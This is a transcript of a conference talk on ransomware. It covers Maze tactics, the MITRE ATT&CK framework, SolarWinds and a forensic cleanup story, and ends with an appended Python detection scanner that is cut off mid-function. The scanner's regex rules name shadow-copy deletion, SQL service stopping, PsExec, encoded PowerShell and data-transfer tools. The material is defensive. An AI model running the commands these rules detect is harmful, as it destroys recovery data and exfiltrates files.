
Excited to introduce Jeremy, and so I am going to go ahead and go through the introduction in Jeremy's bio. Jeremy Rasmussen is the Chief Technology Officer of Abacode, a company providing managed security and compliance advisory services to businesses across all industries. He is also an adjunct professor at the University of South Florida and founder of the USF Whitehatters Computer Security Club. Since 2000 he has taught courses in cryptography and network security, ethical hacking, digital forensics investigations, and mobile and wireless security. For 25-plus years he has performed R&D of cyber solutions for government and commercial customers. Jeremy is a CISSP and Certified Ethical Hacker, and he was named 2017's Tampa Bay Technology Leader of the Year.

So, very excited to have Jeremy here today to speak with us on his talk, Ransomware: The Real Pandemic. And with that being said, I'll go ahead and let you take it away, Jeremy.

Thanks, Wilfredo. Hope everybody can hear me okay. I'm very excited to speak here again; I think this is my fifth year speaking at BSides Tampa Bay. It's definitely going to be a different situation this year than usual. I think we had almost a thousand or more people last year in person, right before the pandemic really started hitting, so that was kind of the last big event I attended before COVID struck. COVID has been bad, it's been a change, it's caused a lot of issues, but I'll tell you what the real pandemic out there, from what we've seen, is: ransomware, because we've just seen it hit so many companies. We get about a call a week now to come in and try to clean up, and unfortunately those are not managed services customers of ours. I'm CTO of Abacode, which is a company that does managed cybersecurity and compliance programs for companies, and we know that you can't find enough qualified people to do this work, and to hire a whole team to do it would take probably six or eight people, and most mid-size enterprises can't afford that. So we try to put together solutions to manage something as an outsourced program for somebody and become just a part of the team, really. And so our managed services customers, knock on wood, don't get hit by ransomware, because we're going to try to see something and stop it before it becomes a real issue. But the companies that don't have it in place, that's kind of what I'm going to talk about: some stuff we've seen over the last year, specifically around Maze ransomware and some other strains, the types of TTPs (tools, techniques and tactics, or procedures; there are different ways you can expand that acronym), the way that these attackers are behaving and causing mischief, and hopefully give you some information that you'll be able to use in your environment to lower the threat, lower the risk of getting hit by some of these really bad attacks. So having said that, let's advance to the agenda. I'm going to make sure you guys see
So Jeremy, we did lose you for a second. If you're trying to show your screen, I'm not seeing it at the moment. All right, let me try again.
How about now? See that? Awesome. Again, thanks for joining me. We're going to talk today about the MITRE ATT&CK framework, which is a way of analyzing the TTPs of our attackers, the adversaries that are out there. We're going to look at the changing landscape over the last year. I do want to mention some things about the SolarWinds attack, because it's been in the news lately; not necessarily ransomware, but we're going to apply the MITRE ATT&CK framework principles to that, and then apply them to the Maze ransomware itself and show you what happens during a forensic cleanup and investigation, which is unfortunate for those companies that aren't proactive and don't have the protections in place. These are some of the things that can happen, and these are the steps we take to go through and clean up, and then give you some advice on stuff you should be doing right now.

So let's dive right into it. The concept of an attack kill chain has been around for more than a decade; I think Lockheed Martin was the first who came up with it. In military terms a kill chain is: find the target, reconnoiter the target, destroy the target. From a cyber standpoint, we're looking at these typical things that an attacker will do, and we can key on these indicators of compromise and stop stuff before it becomes a real problem in the environment. And so MITRE Corporation, which is a non-profit government think tank type company, came up with this very detailed list of what I would say are tools, techniques and tactics, or, some people say they're called techniques, tactics and procedures (the acronym changes depending on whom you ask), for how our adversaries behave. I remember going back to like 1999, 2000, I was reading Hacking Exposed, like the first edition, and it talked about this: the methodology that hackers use: reconnaissance, trying to find more information about the target you're going to go after, and then finding some kind of vulnerability to exploit, gaining a foothold, and then moving from there: lateral movement, pivoting, escalating privileges, and doing your mischief. And that really hasn't changed that much, but what they've done is they've really looked at some indicators of compromise associated with those types of things on the kill chain, so that the game for us as the defenders, as blue teamers, is to try to stop the kill chain, stop these activities as early as possible, up there towards reconnaissance and resource development, and before, even before, initial access. But maybe even after initial access happens, we don't want to get to the execution and persistence and privilege escalation stages; we want to stop it, because down at the bottom of the kill chain is impact, and that's when the attackers are disrupting your business and operational processes, and it's really too late by that time: they're encrypting files, they're demanding a Bitcoin ransom, and all that stuff.

There has been a little bit of criticism, interesting to note, of actually having reconnaissance and resource development up there at the top of the chain, because, like, what can you do about it, right? I have this certain perimeter that I'm trying to protect, this concept of my environment; what could I possibly do to limit reconnaissance? Well, there actually are some things you can do. You can train your people not to give out information, right, and empower them to be the first line of defense through cyber awareness training: don't speak to people on the phone and give out data, don't give it out over email, don't respond to phishing attempts and stuff like that. In terms of them gathering, marshalling their resources to come after you, I don't know if there's that much we can do. We can always try, from a law enforcement standpoint, to disrupt the international supply chain for these hacking groups, but as I'm going to show you later on, they're very well organized; they even have affiliate programs now and have their own red team, threat hunters and so forth. It's really amazing how organized and business-like they are. But just looking through the rest of the chain: initial access is where the attacker is gaining a foothold in your environment, and we'll talk about some of those initial infection vectors that
they typically use. Execution is trying to remotely execute code to spawn a process, set up a keystroke logger or scrape memory for passwords, things like that. Persistence is really a back door, a covert channel, so they can get on later. A lot of times we'll find an attacker will exploit some vulnerability to get into a system and then they'll fix it so that nobody else can get in, because now that system belongs to them; it's their system. But they will set up a back door for themselves so they can get in later through normal account login. Privilege escalation is the idea that you don't want to just be an unprivileged user; you want to have root-level or administrative-level access so you can do more. Especially if you have domain admin, it's game over, right? You can do whatever you want. You can insert a rootkit down at the lowest level, maybe even under the operating system, so that you can forge back results to any antivirus or endpoint protection that's running and lie to it about what you have there. So if you have that level of access, you have the keys to the kingdom. The only way to get rid of somebody when they have that is really a low-level format and reinstall the operating system, reinstall files from backups. It's sad to say, but that's what has to be done.

Discovery and lateral movement and collection is all moving around looking for things, and you might ask yourself, what are attackers looking for? Well, in my experience, a lot of these attackers are looking for product plans, five-year plans, strategic plans. They're looking for stuff out there, because you could hire a group of R&D people to come up with a new product that's going to cost a lot of money, and sometimes it comes to nothing, right? You spend hundreds of thousands or millions of dollars on developing a product and it never really comes to fruition. Or you could hire a couple of hackers for a few bucks who will go in, break into that system and steal all their product plans, and then you have access to those without having ever had to pay for the R&D. So other nation states like Russia and China and these other ones are really into that idea of just stealing data. They don't really see it as a negative thing; they see it as a positive for their country that they're gaining this data, this intelligence, for them. Everything's fair game that they can hack into.

Command and control: there's always going to be some connection out to some external site that can allow this remote person that now has access into your system to issue additional commands and gather data. There's going to be some staging of data before exfiltration, so a lot of times we can see 7-Zip files and RAR files and different types of caches of data that are getting staged to be sent out. And then exfiltration is how they get that data out. If they know that you're not really looking, if they know that you don't have the capability of surveillance on your own environment, which I would say a good portion of companies do not, they don't even know what's going on on their networks. For example, we get hired to come in and red team or pen test a network, and we're going to come in kind of stealthy, unannounced, after hours, obfuscate our methods, very quiet, low and slow as they say, and a lot of times they won't pick up any of the activity. They're like, hey, we're going to start the test, and we're like, we're already finished with the test and we have a domain admin, so the test is over. But that's because they didn't know what they didn't know, and that's the issue. So a lot of times these attackers don't really care if anybody sees what they're doing, because nobody's looking, and so they'll just be as noisy as they want to. But other times they know that there's some sophistication there, there's some monitoring capability, and they'll interleave data to make it look like regular traffic going out of the network so that it can't be detected as easily. And of course, as we talked about before, impact is the idea of doing something naughty: encrypting all the files and demanding a Bitcoin ransom, or threatening to dox the files out there to the public.

As you know, we've gone through a lot of changes over the last year. I mean, this whole idea of the pre-COVID view being this kind of castle that you're guarding, and this protective perimeter that everything traverses through the firewall, that's a little bit of a pie-in-the-sky notion anyway for the last few years, right? As we've been migrating to the cloud, you're using software as a service, you've got mobile and wireless, so the perimeter was already kind of fuzzy,
but especially now that everybody's working from home, people are outside the traditional protected perimeter. Imagine how much you accomplish on social media: we use LinkedIn for HR and hiring, Twitter for help desk support, Facebook for public relations, Instagram. So you're running a good portion of your business on social media, but is that coming under IT security visibility and access control? Probably not. It's probably being run by the marketing department or whatever, and those people are typically security amateurs. Whenever we do an assessment for an organization, we first need to take stock of where all their important critical data are, right? And so I'm just thinking of a professional sports team we did; I won't say who it was, not in Tampa Bay, it was another one, a very prominent billion-dollar organization, a professional sports team. The first thing we did is try to find out where all their data were, and so they're using a SaaS system for payroll, one for finance, one for ticketing, CRM, customer relations, baseball analytics (like, I kind of gave away what sport it was). They had brought in some guys from Google to do analytics for them, and so, like, everybody else was on Office 365 and Azure, and these Google guys like Google stuff, so they're on G Suite and Google Cloud Drive. And so finding out where all the data were and who had control of it and what the status of multi-factor authentication was: almost impossible. Oh, they even had these tenants on their network from outside vendors, and they weren't even part of the network, but they had domain rights and domain access and emails and all that stuff. The funny thing was they didn't even know if their ticketing system was on premises or in the cloud; we had to find it. So it's funny that these big multi-billion-dollar corporations sometimes don't even know where their data is to start with. So you've got to find that, understand how to protect it and all that, and a lot of times it's not where you think it is and it's not being protected the way you think it is.

So we have this whole idea of zero trust now. It's not just a buzz phrase anymore. The new normal is: assume that you have a breach, like somebody's already inside your network, and how do we limit what they can get access to? Segment them off, apply authentication everywhere, and limit their ability to get to important data. It's like the whole idea of the Navy building ships knowing that they have to reach their destination even if they have a leak. You can't keep every drop of water out of a ship, but it still has to go where it needs to go. That's the idea of our new post-COVID world: there's going to be somebody in your organization that's not supposed to be there; how quickly can I figure out that they're there, eradicate them, and correct that problem so it doesn't happen
again. So, looking at the SolarWinds attack from a MITRE ATT&CK framework perspective: there are some really great write-ups on this done by FireEye and CrowdStrike and some others, and they came to realize that it all started with this Sunspot malware, which actually infected the build environment of SolarWinds. It established persistence with scheduled tasks that triggered at boot; we're very familiar with that through our MITRE ATT&CK framework, because persistence is one of the first things you do. It uses stealth through encryption methods to hide its source code and hide any logs. It was very clever, because they would monitor and inject into any running process of MSBuild.exe, which is a Visual Studio build process. So whenever a build was getting ready to kick off for the Orion software, they would scan for that and inject their trojan horse in there, and also they disabled debug warnings during the builds, so that if there were any errors thrown or warnings caused by their trojan, the build people, the DevOps folks, couldn't see it. So it was very, very stealthy, clever how that went in. The point of Sunspot was to put in place Sunburst. If you want to really read an incredible write-up, FireEye, and I think, to their credit, SolarWinds, FireEye, CrowdStrike and all these have been open about information sharing, because this is such a widespread attack, and they wanted to make sure everybody had as much information as possible. They gave very detailed information, down to the GUIDs and processes spawned and network connections out, exactly how this thing behaves, so we can see. But the whole point of Sunburst was really to allow additional reconnaissance, command and control, things like that, the various things that we see in the attack chain, right, the kill chain. Teardrop and Raindrop were really different versions of droppers that were put in by Sunspot to allow them to just put in a post-exploitation framework. If you're not familiar with Cobalt Strike Beacon, it's a for-pay version of a pen testing framework, like Metasploit Framework, but there are like a million cracked versions of it out there on the dark web, so they just used some trojanized version of that, and it gives you all kinds of great remote access capabilities: command execution, keystroke logging, file transfers, privilege escalation, etc. So that was the point of all that: to act as a dropper for this post-exploitation framework.

But my question is, what was the initial vector of attack? I've researched this and I have not found it anywhere online, and if you can find it, put it in the chat or submit it through the Q&A or whatever: what was the initial vector of attack that allowed the attacker to insert the Sunspot trojan into the build process in the first place? Nobody's admitted to that or how that came about. My guess is it probably wasn't very sophisticated. It was probably along the lines of what we see with any of these attacks: if they don't have a great surveillance capability with a SIEM, a security information and event management solution, and 24/7 eyes-on-glass people watching for certain types of attacks, they may have missed that initial dropper that allowed them to infect the build environment. The sad thing about all this is, when they put out these builds, they were signed with the SolarWinds certificate, so if you're a SolarWinds customer, you were getting signed software that was supposed to be trusted software from SolarWinds, but it came to you trojanized and full of Cobalt Strike trojans.

All right, well, let's apply the MITRE ATT&CK framework to Maze ransomware. And before we do: what do you think the initial vector of attack is most often? I'm going to put a little poll here in our chat. What do you think the initial vector of attack is most often for ransomware? My answer comes from empirical observations, things that we've seen in our own work over the last couple of years. What do you think?
A lot of people are guessing phishing and social engineering, and that's kind of the conventional wisdom, that people are the weakest link. But I have some news for you. This is my own research, and this is borne out by groups like Coveware and some other ones that do ransomware negotiations: sixty percent of the attack vector is remote access, remote desktop misconfiguration; thirty percent through phishing, social engineering; and then ten percent, like missing patches, misconfiguration. So I've seen remote desktop, port 3389, used in dozens of successful attacks. It's great for allowing quick access to files, opening applications, troubleshooting problems; if you're an admin, it's awesome. But if not configured properly, that can really be opening the floodgates for adversaries to come in. And I should mention I'm not just talking about Windows RDP; I'm talking about any third-party software that allows access, for example LogMeIn, TeamViewer, RemotePC, Zoho Assist, ConnectWise Control. Oldsmar, exactly. Over Super Bowl weekend in Oldsmar, there was somebody on the night shift watching the water treatment plant, and they saw the cursor moving on the screen; it just started moving and somebody started clicking on things with TeamViewer. Now, that might have been a normal occurrence from their IT department, except for maybe a couple of things. It was the middle of the night; that doesn't mean much for some IT people (I got an email from our IT person at four in the morning), so that isn't that weird. But the other thing was that user was changing the sodium hydroxide levels of the water supply to 100 times the normal amount. Okay, so yeah, that's bad. They're poisoning the water. This is horrible. So obviously a few things here: you don't want to ever have your industrial control systems or SCADA systems connected to a system that can allow remote access. But let's look deeper. How do you think that attacker gained access to the TeamViewer in the first place? Well, I think you would have to say that it's probably not very sophisticated. A lot of RDP abuse comes through just simple brute-force password guessing on an Internet-exposed service, I mean, really: an improperly configured service that allows unlimited attempts, starting with no password, password equals username, password equals "password" or whatever. If you've ever done any red teaming or password cracking, you know the drill, right? You try a dictionary attack or a word list first, and then a hybrid attack where you're spelling things backwards and forwards, you're adding a number and a question mark or an exclamation point at the end or whatever. You might have rainbow tables, which are hashed versions of all passwords of certain lengths. But looking online, Malwarebytes said that this kind of script-kiddie-level attack of just brute-force password guessing continues to be on the rise. And another thing they do is called credential stuffing. So here you find a valid set of user ID and password combinations, usually stolen from some other data breach, and then you try out those combinations on other systems, which is exactly why, obviously, you should never reuse a password across multiple accounts.

Just an example: my company, Abacode, was doing what we call a proof of value, where we deploy our solution for a customer to show them; we get them hooked on the crack, we'll give it to you for free for a few weeks, once you realize you can't live without it then we'll start charging you, that kind of thing. But we deployed this SIEM. If you're not familiar with SIEM, security information and event management, it's the type of software that collects log data from your firewall, your network infrastructure, your servers, endpoints, cloud, SaaS, API connectors, anything that you can syslog, and pours all this into one aggregation server. Then you run all these correlation rules on there, something like 30,000 pre-configured rules, looking for indicators of compromise, with a constantly updated threat feed. So when things like the Exchange Server bugs, which we saw a few weeks ago, come out, you'll immediately get an update on there of new things to look for. And then you have your analysts looking at this, eyes on glass 24/7, popping up these alerts and then running them to ground, making sure they're handled. Within hours of deployment of the solution, we saw that somebody was pounding on RDP port 3389 from Russia, and we were able to tell them, hey, we need to fix that now. The alert from the SIEM just says brute-force password guessing attempt on this box coming from this IP address, but the deeper issue there is, why are you not limiting the number of login attempts? Why are you not whitelisting that to just one trusted IP? And all these other things, your layers: VPN, you want to push this through a bastion host, and all this stuff. We looked at the deeper security architecture issues and tried to advise them on that stuff.

So Maze is especially a pain in the butt from a business point of view, because the people that run Maze are really good business people. Starting back in 2019,
they're the ones who began to use some novel extortion methods. It's funny if you look at their posts; they're in Russian, but you can find them out on the dark web and places, and they're very open, like social media posts. Translated to English, they call their victims "clients", right, which implies that they think they have a contractual relationship with these victims or clients. So they deliver on their part of the agreement, which is encrypting all the files, and then they expect their clients to deliver on their part, which is paying the ransom. And so not only are they going to try to get a ransom by selling you the decrypt key, they're also going to threaten to dox you, right? They're going to publicly release all of your stolen data out on the dark web. They're not going to be quiet about it; if you don't pay, they'll go very public with the details about the compromise. They'll show some documents as proof. In some cases they even threaten to tell the securities and financial regulators, so think about that: if you're a publicly traded company and word gets out that there's been a breach, your shareholders can rise up against you and sue you and things like that. So this allows them in some cases to get multiple extortion fees. And it's incredible: they have this affiliate program where they'll pay pen testers and red teamers to find exploits, like maybe up to forty percent of the ransom. Now, if I'm a pen tester, how do I know I'm really getting paid 40% of the real ransom, or they're not just giving me like X? And when they advertise, it's funny when they're recruiting, they're like, no slackers or scammers, we want people who are dedicated. Oh, and by the way, the Maze group at least says that they don't go after schools, hospitals, airports or government, just greedy American corporations. But who knows. And sometimes they even do try to pay off insiders. You may have read about this: there's a Tesla employee, and this wasn't the Maze group, this is another group, who turned down a million dollars to plant malware in the Tesla manufacturing plant. So they do sometimes try to recruit insiders.

All right, so some of the stuff you might see from Maze: it does establish persistence through a startup folder batch file. It does try to disable IDA Pro and other types of tools that allow you to do malware reversing and analysis. It does do credential stealing through launching Mimikatz; if you're not familiar with Mimikatz, it's a great tool that allows you to scrape basically plain-text passwords out of RAM. It uses PsExec and PowerShell to move laterally, so once you've gotten one user ID and password that's privileged, admin-level, you can just PsExec to other systems to spread the infection. Command and control is actually using hard-coded IPs via HTTP; that's really not that sophisticated, right? I mean, that should be something you could easily look for if you know the domains to watch for on a block list, but of course they change them so frequently it's hard to keep up; they're registering hundreds or thousands of domains a day. For data collection and exfiltration they're often using 7-Zip and WinSCP, so they're staging; they're looking for important data, sensitive data, personally identifiable information, financials, product plans, stuff like that, IP, and then they're zipping it, and then they're going to use WinSCP or something to send it off to some cloud resource. From an impact standpoint, they're trying to clean up their tracks; they're making it as hard as they can for you to recover by deleting shadow volumes, stopping the SQL service so they can encrypt databases, and stuff like that. It's really pretty horrible.

Well, Wilfredo, how much time do I have left? I have to know how quickly I should speak here, so we want to leave some time for questions.

I would probably give it about 10 more minutes.

Thanks very much, perfect. Yeah, last year I was doing a talk on post-quantum cryptography, and I got so much into speaking about quantum computing that I left like five minutes at the end to actually talk about post-quantum cryptography, so I don't want that to happen this year. So this is
this is uh a little like program campaign that we've we've been running um whoops sorry pull that over here uh i basically i i wrote a um a document about um what it looks like to um sorry i'm pulling this up right now what what it looks like to run a um a digital forensics and instant response uh session and so um what i'm gonna do is kind of walk you through that hold on one second
Apologies, I got my notes mixed up. Well, you know what, I'm just going to wing it here, so this is live without a net. I don't have my notes available, but I kind of know how this thing runs. The first thing we do is usually we get a call at, I don't know, four or five in the afternoon, because what happens is they got hit with ransomware. They see a message on their computer when they come in in the morning; they probably got hit about midnight, and they come in at like 8 a.m. and all their files are encrypted. And by the way, this Maze ransomware is very cheeky. They tell you what you did wrong, like "your security sucks and you're just going to have to live with it, now you're going to have to send us a Bitcoin ransom to get your files back." Every single file that you have is going to be turned into an encrypted file, and they're going to leave these little text files around with this warning, this chiding. It's really irksome, because they're like "you should have training for your people so you don't click on links" and stuff like that, with their not-so-helpful security advice.

Anyway, we'll get the paperwork signed right away, NDA, MSA and all that stuff, because we always want to sign our T's and C's before we get started on a DFIR cleanup. And we'll come to find out usually that they have probably been working on this themselves all day, running around with their hair on fire, because they didn't have any incident response plan, they didn't know what they were doing and they didn't know who to call. In some cases they've already called a company about doing a negotiation and they got a bid. Like in this case (I'm conflating a bunch of stories together here of things that actually happened within the last six months, and I'm not going to give you any details on who they are, to protect the innocent, or I should say the victims, but the details are real), this company does manufacturing, production and shipping logistics of certain products. And by the way, if you look at the Maze ransomware attack vectors, it's across the board, but they do hit a lot of manufacturing operations, because they know these guys are not usually very sophisticated from an IT standpoint. They have a lot of OT, operational technology, and it's pretty easy to hit them and get them to pay, because they'll be completely shut down: they can't ship product, they can't receive payments, they can't do anything until they get unstuck from this ransomware situation.

So in this case this is exactly what happened. Their financial system was on some kind of Oracle CRM or financial system, and they thought they were backing it up to the cloud. They weren't. As they say, Schrödinger's law of backups: the state of a backup is only known when you try to do a restore. In this case they realized they weren't actually doing what they thought they were doing, and the only backup they had was going to a NAS locally, so the NAS also got encrypted along with the primary. So they had nothing; they had no financials going back for like two years, unfortunately. So they were dead in the water, and they had already reached out to a company about paying a ransom. The attackers were asking for two million dollars initially for the ransom, and these guys were offering $500,000. They were like, "what the heck, we're a fairly small manufacturing operation here, we don't want to pay that, and we don't know what we're doing."

So they got in touch with us, and this is typically what happens: we get brought in at the end of the day after they've already tried all day and got nowhere. It always makes your spouse real happy when you start on a project at seven or eight in the evening. That's when you're starting on the thing, and then it kind of goes all night from there. You're doing activities and trying to clean up: you're segmenting off systems, you're turning off systems, you're changing passwords. Now, in the olden days, when I initially taught forensics, digital forensics at USF probably 10 years ago, conventional wisdom was pull the plug, yank the hard drives, copy the hardware, do a bit-stream-level copy of the hard drive, and then work off a copy. That's kind of old school, because let's face it, the goal of forensics now is not prosecution. These people are coming in from Russia and North Korea or whatever, Iran; we're not going to have any reciprocity from a legal standpoint, we're not going to bring them to justice. So attribution: really not that important. Protecting the integrity of the data: not that important really anymore. What we want to do is find out what happened, fix the problem, make sure it never happens again, and help them remediate.
Okay, so that's usually the goal now. So in this case we got involved, and we started looking at the thing, and there are three possibilities for how they got in. Now we don't think it was phishing, because we can look through O365 logs and see things like that: we can see if rules were created, we can see if people were logging in at odd times from odd places, and we didn't see any of that. But what we did see is they had some deprecated servers. They had an Exchange server they were running; even though they had migrated to Office 365 in the cloud, they were still running a deprecated version of Exchange because their CRM system needed to use that to send out messages. I don't know why it needed to do that, I don't know why they couldn't have a connector to an O365 account, whatever; they just didn't know how to do it. And this is the case sometimes: you just don't have savvy IT people that know what they're doing. And then the other issue was, they were running (and we've seen this numerous times) a company store where they had logo and promotional items: polos, shot glasses, t-shirts, hats and stuff. They thought it was on the corporate intranet, but it was really exposed to the public internet, and it had this 1990s-era PHP code for the e-commerce system they were running. So somebody came in and was able to open that thing. Once they get a foothold there, either through the deprecated Exchange server or the PHP web store, they pivot from there into other parts of the system. All right, so it just kept going on and on.

So what we immediately do is we deploy a solution that allows us to gather compromise information, so we can look through registries, memory cache, dropped files, network connections and all this stuff. We're able to gather that ephemeral data now, because we want to know if somebody is still actively attacking them. If we look in memory we can see if Mimikatz is there, we can see if other password-scraping software and stuff like that is still resident in memory. That will tell us for sure that there's an active attack going on. We can also see the staged data. As I was saying, part of the MITRE ATT&CK framework is collection and exfiltration; we can see the staged data with the zips, the RARs, the 7-Zips, and we can see the FTP sessions out. We can see if the horse has already bolted out of the barn; all that stuff we can see.

Let me fast forward to the end of the story. We did engage, we had to engage with a third party to do the negotiation with the hackers. You always hear these guys have great customer service, because they're real concerned about their reputation and they don't want anybody to think that if they pay they're not going to actually get the key and all that. But their customer service is greatly overrated, in my opinion. We had to actually find them: the email address they gave us didn't work, we weren't getting any response, and finally, because this group that we work with knew somebody else within the Maze ransomware group, they were able to get in touch with them and finally open the negotiations. It went back and forth. They made an offer of like $750,000. What you can do is you can say "I don't need all my files decrypted, I just need this one server decrypted," and you can pay less for that. I think this company ended up paying like $425,000 or something like that.

Think about this, working with these negotiation groups. The one we work with is all former law enforcement guys. They do a conflict-of-interest validation check with each engagement, because Homeland Security, or maybe it was the Justice Department, last year came out with this thing saying you can't negotiate with ransomware groups because you could be sponsoring terrorism, right? But there are certain ones you're allowed to work with that aren't state-sponsored terrorism or whatever. So anyway, you have to do all that. But I always wonder if the negotiation group is in cahoots with the attackers, by saying "yeah, victim, you give us five hundred thousand dollars and we'll get your decrypt key," but then they go work with the attacker and get the thing down to $400,000 and pocket $100,000 themselves. Nobody would ever know; it's a completely unregulated industry, so all this could happen.

Long and short, you don't want to ever find yourself in this situation of having to go through a digital forensics investigation and cleanup, for the reason I said before: you're probably going to have to end up rebuilding your entire environment, deleting everything, low-level formatting all your disks,
restoring from backups. Oh, by the way, you may not have enough virtual space available to do the decrypt. If you're decrypting all of your servers and files, you need an equivalent amount of memory and storage available for those, and you may not have that available. In some cases we have to cobble together a little NAS from servers and backup storage to be able to do that.

All right, so wrapping up, here's the stuff I recommend you should do now: ensure that you're not a victim by having adequate access controls in place, with multi-factor authentication. Let's see, whitelisting, so you can only allow remote access from trusted locations. Don't have so many admin accounts. We did an insurance company pentest and I found that it had like 238 domain admin accounts. Why do you need that many? You shouldn't have that many; you should have very few, and they should be heavily regulated. Vulnerability management. You can actually turn on network level authentication, which makes people authenticate to a remote desktop session before they establish a real session; that will cut down on the idea of a denial-of-service attack from brute-force password guessing. Training to empower your users, segmentation, all that stuff. This is all the stuff that you really need to have in place.

And then if you're looking for it, to monitor, here are some kind of novel things that I would say to look for: any kind of privileged use, any kind of dropping of Metasploit or a Cobalt Strike beacon or Meterpreter or any other kind of exploit framework; privileged use of PsExec, PowerShell and any of these other tools that are often associated with malware and with ransomware. And then here's a little one for you: the GetUserDefaultUILanguage function is a command also always associated with Maze ransomware, because they are attacking from another country, and so they're going to call this function to see where they are, what language is being used. Typically (and I don't know if you have any software developers here) you wouldn't use that function if you're developing in English for English speakers. This is kind of a giveaway that this is a remote attack. All right, a lot of information there. I'm going to be quiet and see if we can answer a couple of questions.

Perfect, and I think we actually have some questions. Paul, do you want to cover those questions? Well, I'm going to just go ahead and look at the top ones in the list. The top one: ransomware and
the increasing use of red teaming tools by ransomware groups. I mean, yeah, it's an alarming trend, but to us it could also be a method of detection, right? All I have to do now is look for a signature of Cobalt Strike or a Metasploit framework and the use of that; I can have either application whitelisting, or I can look for spawned processes or things that are associated with it. Now of course, if they build a custom version of that from source code, then I can't do a signature-based search for it based on a hash or a file signature, but what I can do is look for behavior that's indicative of what Cobalt Strike or Metasploit do. And all the modern endpoint protection, like Cylance, Carbon Black, CrowdStrike, SentinelOne, any of these are going to have that capability to look for bad behavior versus just signatures.

Any other questions? Let's see. I think ransomware has not run its course yet; it's still around, it's still a pandemic issue for us right now. We're still getting calls all the time, so I don't see it going away anytime soon as long as people are still paying. And I have not been at the negotiation table myself; we always bring in a third party to do that. That's why I'm leery of those guys, and I still have my suspicions that they're working together with the attackers.

So Jeremy, there's a question here that I think is good for everyone's awareness. They're asking for advice on how to communicate these issues to clueless leadership. Sometimes there's that balance of not being able to talk to your leadership about these issues because they just truly don't understand. How do you bridge that gap?

Yeah, most of my job is education of C-level people on this issue, and they have to understand that cybersecurity is a business issue first, technology second. If you ask them how they're doing on cybersecurity, typically they're going to reach out to their IT folks and say "hey, how are we doing?" And guess what, those people (a) are probably not security experts, usually, right, or they're wearing multiple hats: they've got the responsibility for IT and IT security, so there's no separation of duties there. When I teach at USF, I don't let students grade their own papers, for a good reason: they're all going to give themselves an A. So if IT is checking its own work, that's a problem; there's no separation of duties. So we try to frame it for them that way: you really need another set of eyes, checks and balances, you need this third-party team to come and watch what you're doing, to do the monitoring. I've probably done more than five or six hundred audits myself for government and commercial customers, and the one thing I usually see missing most of the time is visibility into your environment. Without the visibility you don't know what's going on. You can have all the other protections in place, firewalls, endpoint protection, training for your people, policies and procedures, but if you don't have eyes-on-glass monitoring of what's going on,
you can't say for sure today if somebody's inside your environment and how bad it is. So that's my two cents on that.

Yeah, that's great. I think we have time for probably one more question. There are a lot of interesting questions, but one of the ones that I thought was interesting is: what are your thoughts for the next two to five years on the ransomware issue, and thoughts on cyber insurance and how that might impact the future?

Cyber breach insurance I think is necessary, but it's not a cure-all, and I would say it's a mistake to think that you're going to go get cyber breach insurance and that's going to keep you covered. You can't even get the cyber breach insurance unless you have some level of due diligence in place, and guess what, they won't pay out on a breach if you weren't doing the things that you said you were doing to even get the policy in the first place. Plus we've also seen some situations where they won't pay out if it looks like what was done was perpetrated by a nation state, because then that's considered an act of war, and they have a clause that they don't have to pay if it's an act of war. So cyber breach insurance I think is great as a safety net, to cover anything you made a mistake with: you were really trying to do the right things, you had the best-practices framework in place, but somebody made a mistake. But it should not drive bad behavior, and it should not be seen as a panacea, a cure-all for everything. It does work hand in hand with best practices.

Next two to five years: as I said, I don't see any abatement of ransomware happening anytime soon, because it is so successful. And think about this: if these groups are making billions of dollars a year, they have a great business enterprise, with affiliate programs, threat hunters, red teaming, a great organization with separation of duties. If they took a little bit of the money they made off the ransoms and poured it back into R&D themselves, just like a regular company would, let's just say five to ten percent, they could come up with some great tools and practices that are even more advanced and more effective at sidestepping emerging defenses, right? So I think we're probably going to see that. Up till now I haven't seen any really smart AI-based vulnerability probing, bots or worms or anything like that, but I think it's on the horizon. Computers, AIs, are pretty good at crunching numbers and finding low-hanging fruit in terms of vulnerabilities; they're not as smart yet at finding complex ones. But there's enough, and I think we've been pretty clear about this: you don't have to be that stealthy, you don't have to be that smart or that clever to get stuff by most people if they're not watching, which a lot of companies are not. So you've got to have the visibility. But I think the future we're going to see is attackers getting smarter by pouring R&D money into AI and other things that are going to help them sidestep some of the defenses that we have in place now.

Okay, thank you so much. I think that covers all the questions. I think you have a few more moments; we could probably wrap this up. Thank you so much, Jeremy, for coming to speak with us today, and that's all I've got for now. Thanks everybody for joining.

I think we're part of a scavenger hunt, but if not, I'm just going to put my website there. In the blog section of my website there is a CTF mini challenge for whoever solves it first, and it's fairly difficult. There's a little bit of a forensics challenge there; if you can solve that, we will send you a prize. So go to that website, and in the blog section there is a mini CTF challenge. All right, have fun.
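The monitoring points the speaker lists in his closing recommendations (shadow-copy deletion, stopping the SQL service, privileged PsExec and encoded PowerShell use, staged archives before data leaves, and a binary that calls GetUserDefaultUILanguage) turned into a small behavioral triage scanner. This is an added example and not code from the talk, from Abacode or from any EDR vendor; the event records, their field names, the rule patterns, the severity levels and the one-hour correlation window are all assumptions constructed for the example.

```python
"""Behavioral triage of Windows process-creation events for the ransomware
tradecraft the talk describes: shadow-copy deletion, stopping SQL services,
privileged PsExec / encoded-PowerShell use, archive staging followed by an
outbound transfer tool, and a binary importing GetUserDefaultUILanguage.
Event records and field names below are constructed for this example
(assumed schema, not any particular EDR's)."""
import re

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}
EXFIL_WINDOW_SECONDS = 3600          # staging -> transfer on one host within an hour
UI_LANGUAGE_API = "getuserdefaultuilanguage"

# (rule name, base severity, pattern applied to the lower-cased "image cmdline")
COMMAND_RULES = [
    ("shadow_copy_deletion", "high",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete")),
    ("sql_service_stop", "high",
     re.compile(r"\b(net|sc)(\.exe)?\s+stop\s+\"?(mssql|sqlserveragent|sqlwriter)")),
    ("psexec_use", "medium", re.compile(r"psexe(c|svc)")),
    ("powershell_encoded_command", "medium",
     re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b")),
    ("archive_staging", "low",
     re.compile(r"\b(7z|rar|winrar)(\.exe)?\s+a\b|compress-archive")),
    ("outbound_transfer_tool", "low",
     re.compile(r"\b(ftp|curl|scp|rclone)(\.exe)?\b")),
]


def escalate(severity):
    """Bump one level: attacker tooling run under a privileged account matters more."""
    return {"low": "medium", "medium": "high", "high": "high"}[severity]


def triage(events, privileged_users):
    """One finding per matched rule per event, plus a correlated
    collection-then-exfiltration finding when an archive is staged and an
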